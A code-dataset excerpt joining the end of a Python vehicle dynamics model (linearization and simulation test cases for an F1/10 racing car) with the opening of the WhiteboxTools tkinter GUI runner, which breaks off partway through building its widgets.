dFrx_dvx = -self.Cm2*pwm - 2*self.Cr2*vx
dFrx_dvu1 = self.Cm1-self.Cm2*vx
dFry_dvx = -dFry_dalphar * (self.lr*omega - vy)/((self.lr*omega - vy)**2 + vx**2)
dFry_dvy = -dFry_dalphar * vx/((self.lr*omega - vy)**2 + vx**2)
dFry_domega = dFry_dalphar * self.lr * vx/((self.lr*omega - vy)**2 + vx**2)
dFfy_delta = dFfy_dalphaf
f1_psi = -vx*sinpsi-vy*cospsi
f1_vx = cospsi
f1_vy = -sinpsi
f2_psi = vx*cospsi-vy*sinpsi
f2_vx = sinpsi
f2_vy = cospsi
f4_vx = 1/self.mass * (dFrx_dvx -dFfy_dvx*sindelta)
f4_vy = 1/self.mass * (-dFfy_dvy*sindelta + self.mass*omega)
f4_omega = 1/self.mass * (-dFfy_domega*sindelta + self.mass*vy)
f5_vx = 1/self.mass * (dFry_dvx + dFfy_dvx*cosdelta - self.mass*omega)
f5_vy = 1/self.mass * (dFry_dvy + dFfy_dvy*cosdelta)
f5_omega = 1/self.mass * (dFry_domega + dFfy_domega*cosdelta - self.mass*vx)
f6_vx = 1/self.Iz * (dFfy_dvx*self.lf*cosdelta - dFry_dvx*self.lr)
f6_vy = 1/self.Iz * (dFfy_dvy*self.lf*cosdelta - dFry_dvy*self.lr)
f6_omega = 1/self.Iz * (dFfy_domega*self.lf*cosdelta - dFry_domega*self.lr)
f4_u1 = dFrx_dvu1
f4_delta = 1/self.mass * (-dFfy_delta*sindelta - Ffy*cosdelta)
f5_delta = 1/self.mass * (dFfy_delta*cosdelta - Ffy*sindelta)
f6_delta = 1/self.Iz * (dFfy_delta*self.lf*cosdelta - Ffy*self.lf*sindelta)
A = np.array([
[0, 0, f1_psi, f1_vx, f1_vy, 0],
[0, 0, f2_psi, f2_vx, f2_vy, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, f4_vx, f4_vy, f4_omega],
[0, 0, 0, f5_vx, f5_vy, f5_omega],
[0, 0, 0, f6_vx, f6_vy, f6_omega],
])
B = np.array([
[0, 0],
[0, 0],
[0, 0],
[f4_u1, f4_delta],
[0, f5_delta],
[0, f6_delta],
])
g = self._diffequation(None, x0, u0).reshape(-1,)
return A, B, g
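# A minimal, hypothetical sketch (not part of the original API) of how the
# Jacobians returned by linearize() could be used: one Euler step of the
# continuously linearized (LTV) prediction around the operating point (x0, u0).
def _example_ltv_step(model, x0, u0, x, u, Ts):
	"""Return x + Ts*(g + A(x - x0) + B(u - u0)); assumes the step Ts is small."""
	A, B, g = model.linearize(x0, u0)
	return x + Ts * (g + A @ (x - x0) + B @ (u - u0))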
if __name__ == '__main__':
""" test cases 1-3 use 4 states continuous model
test cases 4-6 use 4 states discrete model
test pairs (1,4), (2,5) and (3,6) should give same results
"""
# vehicle parameters for F1/10
params = F110()
model = Dynamic(**params)
test_case = 3
#####################################################################
# CONTINUOUS MODEL 6 STATES
# start at origin with init velocity [3, 3] m/s
# apply constant acceleration 1 m/s^2 for 1s and then move at constant speed
if test_case == 1:
n_steps = 100
inputs = np.zeros([2, n_steps])
time = np.linspace(0, 2, n_steps+1)
inputs[0,:50] = 1
x_init = np.array([0, 0, np.pi/4, 3*np.sqrt(2), 0, 0])
x_cont, dxdt_cont = model.sim_continuous(x_init, inputs, time)
model.plot_results(time, x_cont, dxdt_cont, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad
if test_case == 2:
n_steps = 200
inputs = np.zeros([2, n_steps])
time = np.linspace(0, 4, n_steps+1)
inputs[1,:] = 0.2
x_init = np.array([0, 0, 0, 3, 0, 0])
x_cont, dxdt_cont = model.sim_continuous(x_init, inputs, time)
model.plot_results(time, x_cont, dxdt_cont, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad after 2 sec
if test_case == 3:
n_steps = 400
inputs = np.zeros([2, n_steps])
inputs[1,100:] = 0.2
time = np.linspace(0, 8, n_steps+1)
x_init = np.array([0, 0, 0, 3, 0, 0])
x_cont, dxdt_cont = model.sim_continuous(x_init, inputs, time)
model.plot_results(time, x_cont, dxdt_cont, inputs)
#####################################################################
# DISCRETE MODEL 6 STATES
# start at origin with init velocity [3, 3] m/s
# apply constant acceleration 1 m/s^2 for 1s and then move at constant speed
if test_case == 4:
Ts = 0.02
n_steps = int(2/Ts)
inputs = np.zeros([2, n_steps])
time = np.linspace(0, n_steps+1, n_steps+1)*Ts
inputs[0,:int(n_steps/2)] = 1
x_init = np.array([0, 0, np.pi/4, 3*np.sqrt(2), 0, 0])
x_disc, dxdt_disc = model.sim_discrete(x_init, inputs, Ts)
model.plot_results(time, x_disc, dxdt_disc, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad
if test_case == 5:
Ts = 0.02
n_steps = int(4/Ts)
inputs = np.zeros([2, n_steps])
time = np.linspace(0, n_steps+1, n_steps+1)*Ts
inputs[1,:] = 0.2
x_init = np.array([0, 0, 0, 3, 0, 0])
x_disc, dxdt_disc = model.sim_discrete(x_init, inputs, Ts)
model.plot_results(time, x_disc, dxdt_disc, inputs)
# start at origin with init velocity [3, 0] m/s
# steer at constant angle 0.2 rad after 2 sec
if test_case == 6:
Ts = 0.02
n_steps = int(8/Ts)
inputs = np.zeros([2, n_steps])
inputs[1,int(n_steps/4):] = 0.2
time = np.linspace(0, n_steps+1, n_steps+1)*Ts
x_init = np.array([0, 0, 0, 3, 0, 0])
x_disc, dxdt_disc = model.sim_discrete(x_init, inputs, Ts)
		model.plot_results(time, x_disc, dxdt_disc, inputs)
| 29.858268 | 93 | 0.616913 | [
"MIT"
] | KlrShaK/bayesrace | bayes_race/models/dynamic.py | 11,384 | Python |
#!/usr/bin/env python3
# This script is part of the WhiteboxTools geospatial analysis library.
# Authors: Dr. John Lindsay, Rachel Broders
# Created: 28/11/2017
# Last Modified: 05/11/2019
# License: MIT
import __future__
import sys
# if sys.version_info[0] < 3:
# raise Exception("Must be using Python 3")
import json
import os
from os import path
# from __future__ import print_function
# from enum import Enum
import platform
import re #Added by Rachel for camel_to_snake function
from pathlib import Path
import glob
from sys import platform as _platform
import shlex
import tkinter as tk
from tkinter import ttk
from tkinter.scrolledtext import ScrolledText
from tkinter import filedialog
from tkinter import messagebox
from tkinter import PhotoImage
import webbrowser
from whitebox_tools import WhiteboxTools, to_camelcase
wbt = WhiteboxTools()
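# The widget classes below each consume one entry of the 'parameters' list returned
# by wbt.tool_parameters(<tool name>). A sketch of the assumed shape of such an
# entry (field names are taken from the parsing code below; the values shown are
# illustrative only, not output from a real tool):
#
#   {
#     "name": "Input DEM",
#     "flags": ["-i", "--dem"],
#     "description": "Input raster DEM file.",
#     "parameter_type": {"ExistingFile": "Raster"},
#     "default_value": null,
#     "optional": false
#   }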
class FileSelector(tk.Frame):
def __init__(self, json_str, runner, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.file_type = ""
if "ExistingFile" in self.parameter_type:
self.file_type = j['parameter_type']['ExistingFile']
elif "NewFile" in self.parameter_type:
self.file_type = j['parameter_type']['NewFile']
self.optional = j['optional']
default_value = j['default_value']
self.runner = runner
ttk.Frame.__init__(self, master, padding='0.02i')
self.grid()
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
fs_frame = ttk.Frame(self, padding='0.0i')
self.value = tk.StringVar()
self.entry = ttk.Entry(
fs_frame, width=45, justify=tk.LEFT, textvariable=self.value)
self.entry.grid(row=0, column=0, sticky=tk.NSEW)
self.entry.columnconfigure(0, weight=1)
if default_value:
self.value.set(default_value)
# dir_path = os.path.dirname(os.path.realpath(__file__))
# print(dir_path)
# self.open_file_icon = tk.PhotoImage(file = dir_path + '//img//open.png') #Added by Rachel to replace file selector "..." button with open file icon
# self.open_button = ttk.Button(fs_frame, width=4, image = self.open_file_icon, command=self.select_file, padding = '0.02i')
self.open_button = ttk.Button(fs_frame, width=4, text="...", command=self.select_file, padding = '0.02i')
self.open_button.grid(row=0, column=1, sticky=tk.E)
self.open_button.columnconfigure(0, weight=1)
fs_frame.grid(row=1, column=0, sticky=tk.NSEW)
fs_frame.columnconfigure(0, weight=10)
fs_frame.columnconfigure(1, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
# Add the bindings
if _platform == "darwin":
self.entry.bind("<Command-Key-a>", self.select_all)
else:
self.entry.bind("<Control-Key-a>", self.select_all)
def select_file(self):
try:
result = self.value.get()
if self.parameter_type == "Directory":
result = filedialog.askdirectory(initialdir=self.runner.working_dir, title="Select directory")
elif "ExistingFile" in self.parameter_type:
ftypes = [('All files', '*.*')]
if 'RasterAndVector' in self.file_type:
ftypes = [("Shapefiles", "*.shp"), ('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Raster' in self.file_type:
ftypes = [('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Lidar' in self.file_type:
ftypes = [("LiDAR files", ('*.las', '*.zlidar', '*.laz', '*.zip'))]
elif 'Vector' in self.file_type:
ftypes = [("Shapefiles", "*.shp")]
elif 'Text' in self.file_type:
ftypes = [("Text files", "*.txt"), ("all files", "*.*")]
elif 'Csv' in self.file_type:
ftypes = [("CSC files", "*.csv"), ("all files", "*.*")]
elif 'Html' in self.file_type:
ftypes = [("HTML files", "*.html")]
result = filedialog.askopenfilename(
initialdir=self.runner.working_dir, title="Select file", filetypes=ftypes)
elif "NewFile" in self.parameter_type:
result = filedialog.asksaveasfilename()
self.value.set(result)
# update the working directory
self.runner.working_dir = os.path.dirname(result)
except:
t = "file"
if self.parameter_type == "Directory":
t = "directory"
messagebox.showinfo("Warning", "Could not find {}".format(t))
def get_value(self):
if self.value.get():
v = self.value.get()
# Do some quality assurance here.
# Is there a directory included?
if not path.dirname(v):
v = path.join(self.runner.working_dir, v)
# What about a file extension?
ext = os.path.splitext(v)[-1].lower().strip()
if not ext:
ext = ""
if 'RasterAndVector' in self.file_type:
ext = '.tif'
elif 'Raster' in self.file_type:
ext = '.tif'
elif 'Lidar' in self.file_type:
ext = '.las'
elif 'Vector' in self.file_type:
ext = '.shp'
elif 'Text' in self.file_type:
ext = '.txt'
elif 'Csv' in self.file_type:
ext = '.csv'
elif 'Html' in self.file_type:
ext = '.html'
v += ext
v = path.normpath(v)
return "{}='{}'".format(self.flag, v)
else:
t = "file"
if self.parameter_type == "Directory":
t = "directory"
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified {} parameter {}.".format(t, self.flag))
return None
def select_all(self, event):
self.entry.select_range(0, tk.END)
return 'break'
class FileOrFloat(tk.Frame):
def __init__(self, json_str, runner, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.file_type = j['parameter_type']['ExistingFileOrFloat']
self.optional = j['optional']
default_value = j['default_value']
self.runner = runner
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.02i'
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
fs_frame = ttk.Frame(self, padding='0.0i')
self.value = tk.StringVar()
self.entry = ttk.Entry(
fs_frame, width=35, justify=tk.LEFT, textvariable=self.value)
self.entry.grid(row=0, column=0, sticky=tk.NSEW)
self.entry.columnconfigure(0, weight=1)
if default_value:
self.value.set(default_value)
# self.img = tk.PhotoImage(file=script_dir + "/img/open.gif")
# self.open_button = ttk.Button(fs_frame, width=55, image=self.img, command=self.select_dir)
self.open_button = ttk.Button(
fs_frame, width=4, text="...", command=self.select_file)
self.open_button.grid(row=0, column=1, sticky=tk.E)
# self.open_button.columnconfigure(0, weight=1)
self.label = ttk.Label(fs_frame, text='OR', justify=tk.LEFT)
self.label.grid(row=0, column=2, sticky=tk.W)
# self.label.columnconfigure(0, weight=1)
self.value2 = tk.StringVar()
self.entry2 = ttk.Entry(
fs_frame, width=10, justify=tk.LEFT, textvariable=self.value2)
self.entry2.grid(row=0, column=3, sticky=tk.NSEW)
self.entry2.columnconfigure(0, weight=1)
self.entry2['justify'] = 'right'
fs_frame.grid(row=1, column=0, sticky=tk.NSEW)
fs_frame.columnconfigure(0, weight=10)
fs_frame.columnconfigure(1, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
# Add the bindings
if _platform == "darwin":
self.entry.bind("<Command-Key-a>", self.select_all)
else:
self.entry.bind("<Control-Key-a>", self.select_all)
def select_file(self):
try:
result = self.value.get()
ftypes = [('All files', '*.*')]
if 'RasterAndVector' in self.file_type:
ftypes = [("Shapefiles", "*.shp"), ('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Raster' in self.file_type:
ftypes = [('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Lidar' in self.file_type:
ftypes = [("LiDAR files", ('*.las', '*.zlidar', '*.laz', '*.zip'))]
elif 'Vector' in self.file_type:
ftypes = [("Shapefiles", "*.shp")]
elif 'Text' in self.file_type:
ftypes = [("Text files", "*.txt"), ("all files", "*.*")]
elif 'Csv' in self.file_type:
ftypes = [("CSC files", "*.csv"), ("all files", "*.*")]
elif 'Html' in self.file_type:
ftypes = [("HTML files", "*.html")]
result = filedialog.askopenfilename(
initialdir=self.runner.working_dir, title="Select file", filetypes=ftypes)
self.value.set(result)
# update the working directory
self.runner.working_dir = os.path.dirname(result)
except:
t = "file"
if self.parameter_type == "Directory":
t = "directory"
messagebox.showinfo("Warning", "Could not find {}".format(t))
def RepresentsFloat(self, s):
try:
float(s)
return True
except ValueError:
return False
def get_value(self):
if self.value.get():
v = self.value.get()
# Do some quality assurance here.
# Is there a directory included?
if not path.dirname(v):
v = path.join(self.runner.working_dir, v)
# What about a file extension?
ext = os.path.splitext(v)[-1].lower()
if not ext:
ext = ""
if 'RasterAndVector' in self.file_type:
ext = '.tif'
elif 'Raster' in self.file_type:
ext = '.tif'
elif 'Lidar' in self.file_type:
ext = '.las'
elif 'Vector' in self.file_type:
ext = '.shp'
elif 'Text' in self.file_type:
ext = '.txt'
elif 'Csv' in self.file_type:
ext = '.csv'
elif 'Html' in self.file_type:
ext = '.html'
v = v + ext
v = path.normpath(v)
return "{}='{}'".format(self.flag, v)
elif self.value2.get():
v = self.value2.get()
if self.RepresentsFloat(v):
return "{}={}".format(self.flag, v)
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Float.".format(self.flag))
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified file/numeric parameter {}.".format(self.flag))
return None
def select_all(self, event):
self.entry.select_range(0, tk.END)
return 'break'
class MultifileSelector(tk.Frame):
def __init__(self, json_str, runner, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.file_type = ""
self.file_type = j['parameter_type']['FileList']
self.optional = j['optional']
default_value = j['default_value']
self.runner = runner
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.05i'
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
fs_frame = ttk.Frame(self, padding='0.0i')
# , variable=self.value)
self.opt = tk.Listbox(fs_frame, width=44, height=4)
self.opt.grid(row=0, column=0, sticky=tk.NSEW)
s = ttk.Scrollbar(fs_frame, orient=tk.VERTICAL, command=self.opt.yview)
s.grid(row=0, column=1, sticky=(tk.N, tk.S))
self.opt['yscrollcommand'] = s.set
btn_frame = ttk.Frame(fs_frame, padding='0.0i')
self.open_button = ttk.Button(
btn_frame, width=4, text="...", command=self.select_file)
self.open_button.grid(row=0, column=0, sticky=tk.NE)
self.open_button.columnconfigure(0, weight=1)
self.open_button.rowconfigure(0, weight=1)
self.delete_button = ttk.Button(
btn_frame, width=4, text="del", command=self.delete_entry)
self.delete_button.grid(row=1, column=0, sticky=tk.NE)
self.delete_button.columnconfigure(0, weight=1)
self.delete_button.rowconfigure(1, weight=1)
btn_frame.grid(row=0, column=2, sticky=tk.NE)
fs_frame.grid(row=1, column=0, sticky=tk.NSEW)
fs_frame.columnconfigure(0, weight=10)
fs_frame.columnconfigure(1, weight=1)
fs_frame.columnconfigure(2, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
def select_file(self):
try:
#result = self.value.get()
init_dir = self.runner.working_dir
ftypes = [('All files', '*.*')]
if 'RasterAndVector' in self.file_type:
ftypes = [("Shapefiles", "*.shp"), ('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Raster' in self.file_type:
ftypes = [('Raster files', ('*.dep', '*.tif',
'*.tiff', '*.bil', '*.flt',
'*.sdat', '*.rdc',
'*.asc'))]
elif 'Lidar' in self.file_type:
ftypes = [("LiDAR files", ('*.las', '*.zlidar', '*.laz', '*.zip'))]
elif 'Vector' in self.file_type:
ftypes = [("Shapefiles", "*.shp")]
elif 'Text' in self.file_type:
ftypes = [("Text files", "*.txt"), ("all files", "*.*")]
elif 'Csv' in self.file_type:
ftypes = [("CSC files", "*.csv"), ("all files", "*.*")]
elif 'Html' in self.file_type:
ftypes = [("HTML files", "*.html")]
result = filedialog.askopenfilenames(
initialdir=init_dir, title="Select files", filetypes=ftypes)
if result:
for v in result:
self.opt.insert(tk.END, v)
# update the working directory
self.runner.working_dir = os.path.dirname(result[0])
except:
messagebox.showinfo("Warning", "Could not find file")
def delete_entry(self):
self.opt.delete(tk.ANCHOR)
def get_value(self):
try:
l = self.opt.get(0, tk.END)
if l:
s = ""
for i in range(0, len(l)):
v = l[i]
if not path.dirname(v):
v = path.join(self.runner.working_dir, v)
v = path.normpath(v)
if i < len(l) - 1:
s += "{};".format(v)
else:
s += "{}".format(v)
return "{}='{}'".format(self.flag, s)
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified non-optional parameter {}.".format(self.flag))
except:
messagebox.showinfo(
"Error", "Error formating files for parameter {}".format(self.flag))
return None
class BooleanInput(tk.Frame):
def __init__(self, json_str, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
# just for quality control. BooleanInputs are always optional.
self.optional = True
default_value = j['default_value']
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.05i'
frame = ttk.Frame(self, padding='0.0i')
self.value = tk.IntVar()
c = ttk.Checkbutton(frame, text=self.name,
width=55, variable=self.value)
c.grid(row=0, column=0, sticky=tk.W)
# set the default value
if j['default_value'] != None and j['default_value'] != 'false':
self.value.set(1)
else:
self.value.set(0)
frame.grid(row=1, column=0, sticky=tk.W)
frame.columnconfigure(0, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
def get_value(self):
if self.value.get() == 1:
return self.flag
else:
return None
class OptionsInput(tk.Frame):
def __init__(self, json_str, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.optional = j['optional']
default_value = j['default_value']
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.02i'
frame = ttk.Frame(self, padding='0.0i')
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
frame2 = ttk.Frame(frame, padding='0.0i')
opt = ttk.Combobox(frame2, width=40)
opt.grid(row=0, column=0, sticky=tk.NSEW)
self.value = None # initialize in event of no default and no selection
i = 1
default_index = -1
list = j['parameter_type']['OptionList']
values = ()
for v in list:
values += (v,)
# opt.insert(tk.END, v)
if v == default_value:
default_index = i - 1
i = i + 1
opt['values'] = values
# opt.bind("<<ComboboxSelect>>", self.select)
opt.bind("<<ComboboxSelected>>", self.select)
if default_index >= 0:
opt.current(default_index)
opt.event_generate("<<ComboboxSelected>>")
# opt.see(default_index)
frame2.grid(row=0, column=0, sticky=tk.W)
frame.grid(row=1, column=0, sticky=tk.W)
frame.columnconfigure(0, weight=1)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
# # first make sure that the json data has the correct fields
# j = json.loads(json_str)
# self.name = j['name']
# self.description = j['description']
# self.flag = j['flags'][len(j['flags']) - 1]
# self.parameter_type = j['parameter_type']
# self.optional = j['optional']
# default_value = j['default_value']
# ttk.Frame.__init__(self, master)
# self.grid()
# self['padding'] = '0.1i'
# frame = ttk.Frame(self, padding='0.0i')
# self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
# self.label.grid(row=0, column=0, sticky=tk.W)
# self.label.columnconfigure(0, weight=1)
# frame2 = ttk.Frame(frame, padding='0.0i')
# opt = tk.Listbox(frame2, width=40) # , variable=self.value)
# opt.grid(row=0, column=0, sticky=tk.NSEW)
# s = ttk.Scrollbar(frame2, orient=tk.VERTICAL, command=opt.yview)
# s.grid(row=0, column=1, sticky=(tk.N, tk.S))
# opt['yscrollcommand'] = s.set
# self.value = None # initialize in event of no default and no selection
# i = 1
# default_index = -1
# list = j['parameter_type']['OptionList']
# for v in list:
# #opt.insert(i, v)
# opt.insert(tk.END, v)
# if v == default_value:
# default_index = i - 1
# i = i + 1
# if i - 1 < 4:
# opt['height'] = i - 1
# else:
# opt['height'] = 3
# opt.bind("<<ListboxSelect>>", self.select)
# if default_index >= 0:
# opt.select_set(default_index)
# opt.event_generate("<<ListboxSelect>>")
# opt.see(default_index)
# frame2.grid(row=0, column=0, sticky=tk.W)
# frame.grid(row=1, column=0, sticky=tk.W)
# frame.columnconfigure(0, weight=1)
# # self.pack(fill=tk.BOTH, expand=1)
# self.columnconfigure(0, weight=1)
# self.rowconfigure(0, weight=1)
def get_value(self):
if self.value:
return "{}='{}'".format(self.flag, self.value)
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified non-optional parameter {}.".format(self.flag))
return None
def select(self, event):
widget = event.widget
# selection = widget.curselection()
self.value = widget.get() # selection[0])
class DataInput(tk.Frame):
def __init__(self, json_str, master=None):
# first make sure that the json data has the correct fields
j = json.loads(json_str)
self.name = j['name']
self.description = j['description']
self.flag = j['flags'][len(j['flags']) - 1]
self.parameter_type = j['parameter_type']
self.optional = j['optional']
default_value = j['default_value']
ttk.Frame.__init__(self, master)
self.grid()
self['padding'] = '0.1i'
self.label = ttk.Label(self, text=self.name, justify=tk.LEFT)
self.label.grid(row=0, column=0, sticky=tk.W)
self.label.columnconfigure(0, weight=1)
self.value = tk.StringVar()
if default_value:
self.value.set(default_value)
else:
self.value.set("")
self.entry = ttk.Entry(self, justify=tk.LEFT, textvariable=self.value)
self.entry.grid(row=0, column=1, sticky=tk.NSEW)
self.entry.columnconfigure(1, weight=10)
if not self.optional:
self.label['text'] = self.label['text'] + "*"
if ("Integer" in self.parameter_type or
"Float" in self.parameter_type or
"Double" in self.parameter_type):
self.entry['justify'] = 'right'
# Add the bindings
if _platform == "darwin":
self.entry.bind("<Command-Key-a>", self.select_all)
else:
self.entry.bind("<Control-Key-a>", self.select_all)
# self.pack(fill=tk.BOTH, expand=1)
self.columnconfigure(0, weight=1)
self.columnconfigure(1, weight=10)
self.rowconfigure(0, weight=1)
def RepresentsInt(self, s):
try:
int(s)
return True
except ValueError:
return False
def RepresentsFloat(self, s):
try:
float(s)
return True
except ValueError:
return False
def get_value(self):
v = self.value.get()
if v:
if "Integer" in self.parameter_type:
if self.RepresentsInt(self.value.get()):
return "{}={}".format(self.flag, self.value.get())
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Integer.".format(self.flag))
elif "Float" in self.parameter_type:
if self.RepresentsFloat(self.value.get()):
return "{}={}".format(self.flag, self.value.get())
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Float.".format(self.flag))
elif "Double" in self.parameter_type:
if self.RepresentsFloat(self.value.get()):
return "{}={}".format(self.flag, self.value.get())
else:
messagebox.showinfo(
"Error", "Error converting parameter {} to type Double.".format(self.flag))
else: # String or StringOrNumber types
return "{}='{}'".format(self.flag, self.value.get())
else:
if not self.optional:
messagebox.showinfo(
"Error", "Unspecified non-optional parameter {}.".format(self.flag))
return None
def select_all(self, event):
self.entry.select_range(0, tk.END)
return 'break'
class WbRunner(tk.Frame):
def __init__(self, tool_name=None, master=None):
if platform.system() == 'Windows':
self.ext = '.exe'
else:
self.ext = ''
exe_name = "whitebox_tools{}".format(self.ext)
self.exe_path = path.dirname(path.abspath(__file__))
os.chdir(self.exe_path)
for filename in glob.iglob('**/*', recursive=True):
if filename.endswith(exe_name):
self.exe_path = path.dirname(path.abspath(filename))
break
wbt.set_whitebox_dir(self.exe_path)
ttk.Frame.__init__(self, master)
self.script_dir = os.path.dirname(os.path.realpath(__file__))
self.grid()
self.tool_name = tool_name
self.master.title("WhiteboxTools Runner")
if _platform == "darwin":
os.system(
'''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
self.create_widgets()
self.working_dir = str(Path.home())
def create_widgets(self):
#########################################################
# Overall/Top level Frame #
#########################################################
#define left-side frame (toplevel_frame) and right-side frame (overall_frame)
toplevel_frame = ttk.Frame(self, padding='0.1i')
overall_frame = ttk.Frame(self, padding='0.1i')
#set-up layout
overall_frame.grid(row=0, column=1, sticky=tk.NSEW)
toplevel_frame.grid(row=0, column=0, sticky=tk.NSEW)
#########################################################
# Calling basics #
#########################################################
#Create all needed lists of tools and toolboxes
self.toolbox_list = self.get_toolboxes()
self.sort_toolboxes()
self.tools_and_toolboxes = wbt.toolbox('')
self.sort_tools_by_toolbox()
self.get_tools_list()
#Icons to be used in tool treeview
self.tool_icon = tk.PhotoImage(file = self.script_dir + '//img//tool.gif')
self.open_toolbox_icon = tk.PhotoImage(file = self.script_dir + '//img//open.gif')
self.closed_toolbox_icon = tk.PhotoImage(file = self.script_dir + '//img//closed.gif')
#########################################################
# Toolboxes Frame # FIXME: change width or make horizontally scrollable
#########################################################
#define tools_frame and tool_tree
self.tools_frame = ttk.LabelFrame(toplevel_frame, text="{} Available Tools".format(len(self.tools_list)), padding='0.1i')
self.tool_tree = ttk.Treeview(self.tools_frame, height = 21)
#Set up layout
self.tool_tree.grid(row=0, column=0, sticky=tk.NSEW)
self.tool_tree.column("#0", width = 280) #Set width so all tools are readable within the frame
self.tools_frame.grid(row=0, column=0, sticky=tk.NSEW)
self.tools_frame.columnconfigure(0, weight=10)
self.tools_frame.columnconfigure(1, weight=1)
self.tools_frame.rowconfigure(0, weight=10)
self.tools_frame.rowconfigure(1, weight=1)
#Add toolboxes and tools to treeview
index = 0
for toolbox in self.lower_toolboxes:
if toolbox.find('/') != (-1): #toolboxes
self.tool_tree.insert(toolbox[:toolbox.find('/')], 0, text = " " + toolbox[toolbox.find('/') + 1:], iid = toolbox[toolbox.find('/') + 1:], tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within toolbox
self.tool_tree.insert(toolbox[toolbox.find('/') + 1:], 'end', text = " " + tool, tags = 'tool', iid = tool, image = self.tool_icon)
else: #subtoolboxes
self.tool_tree.insert('', 'end', text = " " + toolbox, iid = toolbox, tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within subtoolbox
self.tool_tree.insert(toolbox, 'end', text = " " + tool, iid = tool, tags = 'tool', image = self.tool_icon)
index = index + 1
#bind tools in treeview to self.tree_update_tool_help function and toolboxes to self.update_toolbox_icon function
self.tool_tree.tag_bind('tool', "<<TreeviewSelect>>", self.tree_update_tool_help)
self.tool_tree.tag_bind('toolbox', "<<TreeviewSelect>>", self.update_toolbox_icon)
#Add vertical scrollbar to treeview frame
s = ttk.Scrollbar(self.tools_frame, orient=tk.VERTICAL,command=self.tool_tree.yview)
s.grid(row=0, column=1, sticky=(tk.N, tk.S))
self.tool_tree['yscrollcommand'] = s.set
#########################################################
# Search Bar #
#########################################################
#create variables for search results and search input
self.search_list = []
self.search_text = tk.StringVar()
#Create the elements of the search frame
self.search_frame = ttk.LabelFrame(toplevel_frame, padding='0.1i', text="{} Tools Found".format(len(self.search_list)))
self.search_label = ttk.Label(self.search_frame, text = "Search: ")
self.search_bar = ttk.Entry(self.search_frame, width = 30, textvariable = self.search_text)
self.search_results_listbox = tk.Listbox(self.search_frame, height=11)
self.search_scroll = ttk.Scrollbar(self.search_frame, orient=tk.VERTICAL, command=self.search_results_listbox.yview)
self.search_results_listbox['yscrollcommand'] = self.search_scroll.set
#Add bindings
self.search_results_listbox.bind("<<ListboxSelect>>", self.search_update_tool_help)
self.search_bar.bind('<Return>', self.update_search)
#Define layout of the frame
